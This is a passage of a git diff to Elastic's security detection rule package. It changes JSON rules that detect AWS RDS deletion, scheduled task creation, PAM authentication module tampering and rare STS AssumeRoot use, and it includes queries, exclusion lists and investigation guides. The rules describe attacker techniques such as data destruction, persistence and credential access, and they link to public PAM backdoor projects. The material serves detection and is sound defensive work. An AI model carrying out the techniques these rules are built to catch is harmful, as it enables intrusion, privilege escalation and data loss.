The request originated from a known network or VPN.\n - The user normally logs in from this location.\n - The call was made via AWS Console vs CLI vs SDK.\n\n**Correlate Surrounding Activity**\nSearch CloudTrail for:\n- Recent IAM role or policy changes.\n- Privilege escalation events (STS AssumeRole, CreateAccessKey, AttachUserPolicy).\n- Disablement of related safety controls:\n - deletionProtection modified to `false`\n - backupRetentionPeriod set to `0`\n- Suspicious sequencing:\n - Snapshots deleted before the instance/cluster deletion.\n - Network security group modifications enabling broader access before deletion.\n\n**Validate Organizational Intent**\n- Contact the service owner or DB administrator to confirm whether the deletion is expected.\n\n**Assess Impact and Data Recovery Path**\n- Identify which DB instance or cluster was deleted (`target.entity.id`)\n- Evaluate:\n - Whether automated backups existed.\n - Whether point-in-time recovery is still possible.\n - Whether a final snapshot was created.\n\n### False positive analysis\n\n- **Planned decommissioning**: \n - Confirm if this action aligns with a scheduled removal or environment cleanup.\n- **CloudFormation stack deletion**: \n - Stack teardown often deletes RDS resources; confirm if this occurred.\n- **Automated testing or ephemeral environments**: \n - Test/dev pipelines may frequently create and delete clusters.\n- **Infrastructure-as-code workflows**: \n - Terraform destroys or GitOps cleanup jobs can generate legitimate deletion events.\n\n### Response and remediation\n\n**If the deletion was unauthorized:**\n**Immediately restrict the actor**\n - Disable or revoke the user\u2019s access keys.\n - Revoke active session tokens.\n\n**Attempt recovery**\n - Restore from:\n - Final snapshot (if created)\n - Automated backups\n - Rebuild cluster/instance configurations based on IaC or documented templates.\n\n**Perform full log review**\n - CloudTrail, RDS Enhanced Monitoring, and VPC Flow Logs\n - Identify lateral movement or privilege escalation preceding the deletion.\n\n**Scope and contain the incident**\n - Determine whether:\n - Additional RDS resources were targeted\n - IAM permissions were modified\n - Other destructive API calls were made\n\n**Hardening actions**\n - Enable deletionProtection on all critical instances/clusters.\n - Require final snapshot creation for all deletion operations.\n - Enforce MFA for IAM users with RDS privileges.\n - Limit RDS modification/deletion permissions to specific IAM roles.\n\n**Documentation and Follow-Up**\n - Update incident response runbooks.\n - Communicate with service owners and leadership.\n - Add enhanced monitoring rules around:\n - Snapshot deletions\n - Backup retention modifications\n - RDS role changes\n - DeletionProtection disable events\n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/)** \n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/tree/a8c7b313636b406a375952ac00b2d68e89a991f2/docs)** \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/).\n", + "query": "event.dataset: aws.cloudtrail \n and event.provider: rds.amazonaws.com \n and event.action: (DeleteDBCluster or DeleteGlobalCluster or DeleteDBInstance)\n and event.outcome: success\n", + "references": [ + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html", + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteGlobalCluster.html", + "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBInstance.html" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9055ece6-2689-4224-a0e0-b04881e1f8ad", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Use Case: Asset Visibility", + "Tactic: Impact", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 210 + }, + "id": "9055ece6-2689-4224-a0e0-b04881e1f8ad_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/929d0766-204b-11f0-9c1f-f661ea17fbcd_2.json b/packages/security_detection_engine/kibana/security_rule/929d0766-204b-11f0-9c1f-f661ea17fbcd_2.json index 14979c49235..54b63da77e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/929d0766-204b-11f0-9c1f-f661ea17fbcd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/929d0766-204b-11f0-9c1f-f661ea17fbcd_2.json @@ -20,7 +20,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_111.json b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_111.json deleted file mode 100644 index 2f1bd0fbc31..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_111.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Indicates the creation of a scheduled task using Windows event logs. Adversaries can use these to establish persistence, move laterally, and/or escalate privileges.", - "false_positives": [ - "Legitimate scheduled tasks may be created during installation of new software." - ], - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "A scheduled task was created", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating A scheduled task was created\n\nScheduled tasks in Windows automate routine tasks, enhancing efficiency. However, adversaries exploit this feature to maintain persistence, move laterally, or escalate privileges by creating malicious tasks. The detection rule identifies suspicious task creation by filtering out benign tasks and those initiated by system accounts, focusing on potential threats. This approach helps security analysts pinpoint unauthorized task creation indicative of malicious activity.\n\n### Possible investigation steps\n\n- Review the user account associated with the task creation to determine if it is a known and authorized user, ensuring it is not a system account by checking that the username does not end with a dollar sign.\n- Examine the task name and path in the event data to identify if it matches any known benign tasks or if it appears suspicious or unfamiliar.\n- Investigate the origin of the task creation by checking the source IP address or hostname, if available, to determine if it aligns with expected network activity.\n- Check the task's scheduled actions and triggers to understand what the task is designed to execute and when, looking for any potentially harmful or unexpected actions.\n- Correlate the task creation event with other security events or logs around the same time to identify any related suspicious activities or anomalies.\n\n### False positive analysis\n\n- Scheduled tasks created by system accounts or computer accounts are often benign. These can be excluded by filtering out user names ending with a dollar sign, which typically represent system accounts.\n- Tasks associated with common software updates or maintenance, such as those from Hewlett-Packard or Microsoft Visual Studio, are generally non-threatening. These can be excluded by specifying their full task names in the exclusion list.\n- OneDrive update tasks are frequently triggered and are usually safe. Exclude these by using patterns that match their task names, such as those starting with \"OneDrive Standalone Update Task\".\n- Regularly review and update the exclusion list to include any new benign tasks that are identified over time, ensuring that the rule remains effective without generating unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent potential lateral movement by the adversary.\n- Terminate any suspicious scheduled tasks identified by the alert to halt any ongoing malicious activity.\n- Conduct a thorough review of the system's scheduled tasks to identify and remove any other unauthorized or suspicious tasks.\n- Restore the system from a known good backup if any malicious activity has been confirmed and has potentially compromised system integrity.\n- Update and patch the system to the latest security standards to close any vulnerabilities that may have been exploited.\n- Monitor the system and network for any signs of re-infection or further unauthorized scheduled task creation.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.", - "query": "iam where event.action == \"scheduled-task-created\" and\n\n /* excluding tasks created by the computer account */\n not user.name : \"*$\" and\n\n /* TaskContent is not parsed, exclude by full taskname noisy ones */\n not winlog.event_data.TaskName : (\n \"\\\\CreateExplorerShellUnelevatedTask\",\n \"\\\\Hewlett-Packard\\\\HPDeviceCheck\",\n \"\\\\Hewlett-Packard\\\\HP Support Assistant\\\\WarrantyChecker\",\n \"\\\\Hewlett-Packard\\\\HP Support Assistant\\\\WarrantyChecker_backup\",\n \"\\\\Hewlett-Packard\\\\HP Web Products Detection\",\n \"\\\\Microsoft\\\\VisualStudio\\\\Updates\\\\BackgroundDownload\",\n \"\\\\OneDrive Standalone Update Task-S-1-5-21*\",\n \"\\\\OneDrive Standalone Update Task-S-1-12-1-*\"\n )\n", - "references": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.TaskName", - "type": "unknown" - } - ], - "risk_score": 21, - "rule_id": "92a6faf5-78ec-4e25-bea1-73bacc9b59d9", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.005", - "name": "Scheduled Task", - "reference": "https://attack.mitre.org/techniques/T1053/005/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 111 - }, - "id": "92a6faf5-78ec-4e25-bea1-73bacc9b59d9_111", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_208.json b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_208.json index c1544d1118f..cd43e04e184 100644 --- a/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_208.json +++ b/packages/security_detection_engine/kibana/security_rule/93e63c3e-4154-4fc6-9f86-b411e0987bbf_208.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_208.json b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_208.json new file mode 100644 index 00000000000..4d622349218 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/93f47b6f-5728-4004-ba00-625083b3dcb0_208.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may modify the standard authentication module for persistence via patching the normal authorization process or modifying the login configuration to allow unauthorized access or elevate privileges.", + "false_positives": [ + "Trusted system module updates or allowed Pluggable Authentication Module (PAM) daemon configuration changes." + ], + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Deprecated - Modification of Standard Authentication Module or Configuration", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Deprecated - Modification of Standard Authentication Module or Configuration\n\nAuthentication modules, such as PAM (Pluggable Authentication Modules), are crucial for managing user authentication in Linux and macOS environments. Adversaries may exploit these by altering module files or configurations to gain unauthorized access or escalate privileges. The detection rule identifies suspicious changes to these modules, excluding legitimate processes and paths, to flag potential unauthorized modifications.\n\n### Possible investigation steps\n\n- Review the specific file that triggered the alert by examining the file.name and file.path fields to determine if it is a known authentication module or configuration file.\n- Investigate the process that made the change by analyzing the process.executable field to identify if it is a legitimate process or potentially malicious.\n- Check the process.name field to see if the process is one of the excluded legitimate processes, which might indicate a false positive.\n- Look into recent system changes or updates that might have affected authentication modules, focusing on the time frame around the alert.\n- Correlate the alert with other security events or logs to identify any related suspicious activities or patterns, such as unauthorized access attempts or privilege escalation.\n- Verify the integrity of the affected authentication module or configuration file by comparing it with a known good version or using file integrity monitoring tools.\n\n### False positive analysis\n\n- Package management operations such as updates or installations can trigger false positives. Exclude processes like yum, dnf, rpm, and dpkg from the detection rule to prevent these benign activities from being flagged.\n- System maintenance tasks often involve legitimate changes to authentication modules. Exclude processes like authconfig, pam-auth-update, and pam-config to avoid false alerts during routine maintenance.\n- Development and testing environments may frequently modify authentication modules for testing purposes. Consider excluding paths like /tmp/snap.rootfs_*/pam_*.so and /tmp/newroot/lib/*/pam_*.so to reduce noise from these environments.\n- Backup and synchronization tools such as rsync can cause false positives when they interact with authentication module files. Exclude rsync from the detection rule to prevent these non-threatening activities from being flagged.\n- Containerized environments may have different paths and processes that interact with authentication modules. Exclude processes like containerd and paths like /tmp/newroot/usr/lib64/security/pam_*.so to account for these variations.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Conduct a thorough review of the modified authentication module or configuration file to identify unauthorized changes and revert them to their original state using a known good backup.\n- Reset passwords for all user accounts on the affected system, prioritizing accounts with elevated privileges, to mitigate potential credential compromise.\n- Perform a comprehensive scan of the system for additional indicators of compromise, such as unauthorized user accounts or scheduled tasks, and remove any malicious artifacts found.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems may be affected.\n- Implement enhanced monitoring on the affected system and similar environments to detect any future unauthorized modifications to authentication modules or configurations.\n- Review and update access controls and authentication policies to strengthen security measures and reduce the risk of similar attacks in the future.", + "query": "event.category:file and event.type:change and\n (file.name:pam_*.so or file.path:(/etc/pam.d/* or /private/etc/pam.d/* or /usr/lib64/security/*)) and\n process.executable:\n (* and\n not\n (\n /usr/libexec/packagekitd or\n /usr/bin/vim or\n /usr/libexec/xpcproxy or\n /usr/bin/bsdtar or\n /usr/local/bin/brew or\n \"/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service\"\n )\n ) and\n not file.path:\n (\n /tmp/snap.rootfs_*/pam_*.so or\n /tmp/newroot/lib/*/pam_*.so or\n /private/var/folders/*/T/com.apple.fileprovider.ArchiveService/TemporaryItems/*/lib/security/pam_*.so or\n /tmp/newroot/usr/lib64/security/pam_*.so\n ) and\n not process.name:\n (\n yum or dnf or rsync or platform-python or authconfig or rpm or pdkg or apk or dnf-automatic or btrfs or\n dpkg or pam-auth-update or steam or platform-python3.6 or pam-config or microdnf or yum_install or yum-cron or\n systemd or containerd or pacman\n )\n", + "references": [ + "https://github.com/zephrax/linux-pam-backdoor", + "https://github.com/eurialo/pambd", + "http://0x90909090.blogspot.com/2016/06/creating-backdoor-in-pam-in-5-line-of.html", + "https://www.trendmicro.com/en_us/research/19/i/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "93f47b6f-5728-4004-ba00-625083b3dcb0", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 208 + }, + "id": "93f47b6f-5728-4004-ba00-625083b3dcb0_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_109.json b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_109.json index e815db5bd0b..341e24c8a9d 100644 --- a/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_109.json +++ b/packages/security_detection_engine/kibana/security_rule/9510add4-3392-11ed-bd01-f661ea17fbce_109.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_214.json b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_214.json new file mode 100644 index 00000000000..9340465b704 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/954ee7c8-5437-49ae-b2d6-2960883898e9_214.json @@ -0,0 +1,151 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote scheduled task creations on a target host. This could be indicative of adversary lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "logs-endpoint.events.network-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Scheduled Task Creation", + "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism for persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at the same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the first steps should be to determine the original intent behind the configuration and to verify if the activity is tied to benign behavior such as software installation or any kind of network administrator work. One objective for these alerts is to understand the configured action within the scheduled task. This is captured within the registry event data for this rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task was created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature within Windows and used for legitimate purposes for a wide range of activity. Any kind of context should be found to further understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further restrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", + "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.ip != null\n ]\n [registry where host.os.type == \"windows\" and event.type == \"change\" and registry.value : \"Actions\" and\n registry.path : \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "references": [ + "https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "954ee7c8-5437-49ae-b2d6-2960883898e9", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 214 + }, + "id": "954ee7c8-5437-49ae-b2d6-2960883898e9_214", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/962a71ae-aac9-11ef-9348-f661ea17fbce_5.json b/packages/security_detection_engine/kibana/security_rule/962a71ae-aac9-11ef-9348-f661ea17fbce_5.json new file mode 100644 index 00000000000..e050e5cb1a5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/962a71ae-aac9-11ef-9348-f661ea17fbce_5.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the STS AssumeRoot action is performed by a rare user in AWS. The AssumeRoot action allows users to assume the root member account role, granting elevated but specific permissions based on the task policy specified. Adversaries who have compromised user credentials can use this technique to escalate privileges and gain unauthorized access to AWS resources. This is a New Terms rule that identifies when the STS AssumeRoot action is performed by a user that rarely assumes this role against a specific member account.", + "false_positives": [ + "AWS administrators or automated processes might regularly assume root for legitimate administrative purposes.", + "AWS services might assume root to access AWS resources as part of their standard operations.", + "Automated workflows might assume root to perform periodic administrative tasks." + ], + "from": "now-6m", + "history_window_start": "now-7d", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "aws.cloudtrail.resources.account_id", + "aws.cloudtrail.resources.type", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS STS AssumeRoot by Rare User and Member Account", + "new_terms_fields": [ + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.resources.account_id" + ], + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS STS AssumeRoot by Rare User and Member Account\n\nAWS STS `AssumeRoot` issues temporary credentials that grant elevated access into a member account, constrained by the\ntask policy and target policy attached to the request. In normal operations, only a small set of platform, security, or\nautomation roles should ever need to perform `AssumeRoot`, and typically only against a predictable set of member\naccounts.\n\nThis rule is a New Terms rule that detects when a previously unseen combination of calling principal (`aws.cloudtrail.user_identity.arn`) and target member account (`aws.cloudtrail.resources.account_id`) successfully invokes `AssumeRoot`. Activity that matches this pattern may indicate privilege escalation, lateral movement into a new account, abuse of cross-account access paths, or misuse of administrative workflows.\n\n#### Possible investigation steps\n\n- **Identify the actor and target context**\n - Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine:\n - Whether the caller is an IAM user, federated user, or role.\n - Whether this identity is normally used for organization-level administration or automation.\n - Inspect `aws.cloudtrail.resources.account_id` and `aws.cloudtrail.recipient_account_id` to identify the affected member account.\n - Check `source.address`, `source.geo.*`, and `user_agent.original` to understand where and how the call was made (console, CLI, SDK, automation runner, VPN, corporate IP, etc.).\n\n- **Understand session, policy, and target details**\n - Examine `aws.cloudtrail.request_parameters` for:\n - `taskPolicyArn` \u2013 which predefined task policy was requested and what category of operations it enables (e.g., investigation, remediation, read-only, or broad admin).\n - `targetPrincipal` and/or related target fields \u2013 which member account principal is being accessed.\n - Any duration or configuration parameters (such as `durationSeconds`) that indicate unusually long-lived sessions.\n - In `aws.cloudtrail.response_elements`, review:\n - `credentials.accessKeyId` and `credentials.expiration` to confirm that credentials were successfully issued and how long they are valid.\n - Any additional response fields that indicate session constraints or failures (if present).\n\n- **Correlate follow-on activity from the assumed root session**\n - Use the temporary access key from `aws.cloudtrail.response_elements.credentials.accessKeyId` to pivot in CloudTrail:\n - Search for subsequent events where `aws.cloudtrail.user_identity.access_key_id` matches that key.\n - Look for high-impact actions such as:\n - IAM changes (`iam:CreateUser`, `iam:AttachRolePolicy`, `iam:PutRolePolicy`, `iam:UpdateAssumeRolePolicy`).\n - Guardrail changes (CloudTrail, Security Hub, Config, GuardDuty configuration or detector changes).\n - Data-impacting actions (S3 bucket policy changes, RDS/RDS snapshot operations, EFS/RDS delete, secrets reads).\n - Correlate with any prior events for the calling identity:\n - STS calls that created the session used to invoke `AssumeRoot` (e.g., `AssumeRole`, SSO/identity provider activity).\n - Recent IAM policy updates that broadened its ability to perform cross-account administration.\n\n- **Assess timing and operational alignment**\n - Use `@timestamp`, `cloud.region`, and your change calendar to determine:\n - Whether the event occurred during a documented maintenance window or deployment.\n - Whether the region and account align with the caller\u2019s normal operational scope.\n - Compare with other events in the same time window:\n - Organization-level changes, new account creation, or migration work.\n - Other sensitive operations from the same `source.ip` or principal.\n\n- **Validate with owners**\n - Confirm with:\n - Cloud/infra platform teams that normally operate organization-level admin roles.\n - Security/IR teams if they were running an investigation workflow that legitimately uses `AssumeRoot`.\n - Check whether the use of `AssumeRoot` is documented in CI/CD or automation designs that might have just expanded to this account, explaining the New Terms trigger.\n\n### False positive analysis\n\n- **Legitimate administrative cross-account access**\n - Platform, security, or central operations teams may use `AssumeRoot` as part of sanctioned workflows for:\n - New account onboarding.\n - Centralized remediation or investigation.\n - Complex deployment or migration tasks.\n - If this is the first time a specific engineer or automation role is onboarded to a given member account, the rule will fire once because it is a New Terms rule. Validate and, if appropriate, document this as expected behavior.\n\n- **Automation and scheduled workflows**\n - CI/CD pipelines, organization-wide maintenance jobs, or incident response automation may use `AssumeRoot`:\n - Identify automation roles and service principals that legitimately call `AssumeRoot`.\n - Tune with rule exceptions based on `aws.cloudtrail.user_identity.arn`, `user_agent.original`, or specific `taskPolicyArn` values used only by trusted workflows.\n\nIf a pattern emerges where specific roles regularly and legitimately assume root into a consistent set of accounts, consider documenting those identities and, if appropriate, creating narrow exceptions \u2014 while preserving coverage for new, unexpected combinations.\n\n### Response and remediation\n\n- **Contain potentially unauthorized sessions**\n - If the activity appears suspicious or unapproved:\n - Invalidate the credentials issued by `AssumeRoot` (where supported) or constrain their impact by immediately tightening IAM, SCPs, or network controls in the affected member account.\n - Rotate or revoke long-lived access keys associated with the calling principal.\n - Temporarily restrict permissions on roles allowed to call `AssumeRoot` until the investigation is complete.\n\n- **Investigate scope and impact**\n - Using CloudTrail:\n - Enumerate all actions performed with the `AssumeRoot` session access key and identify:\n - Privilege changes (IAM users, roles, policies, permission boundaries, SCPs).\n - Changes to logging and security controls (CloudTrail, GuardDuty, Security Hub, Config, firewall/WAF rules).\n - Data-impacting operations on high-value services (S3, RDS, DynamoDB, Secrets Manager, KMS).\n - Check if similar `AssumeRoot` activity has occurred recently from the same `source.ip`, principal, or member account.\n - Engage application, data, and platform owners for the impacted account(s) to:\n - Assess potential data exposure, integrity issues, or downtime.\n - Determine whether any actions conflict with intended change plans.\n\n- **Hardening and preventive controls**\n - Restrict and monitor `AssumeRoot` usage:\n - Limit which IAM roles and identities can call `sts:AssumeRoot`, using IAM conditions (e.g., `aws:PrincipalArn`, `aws:PrincipalOrgID`, `aws:RequestedRegion`).\n - Where possible, 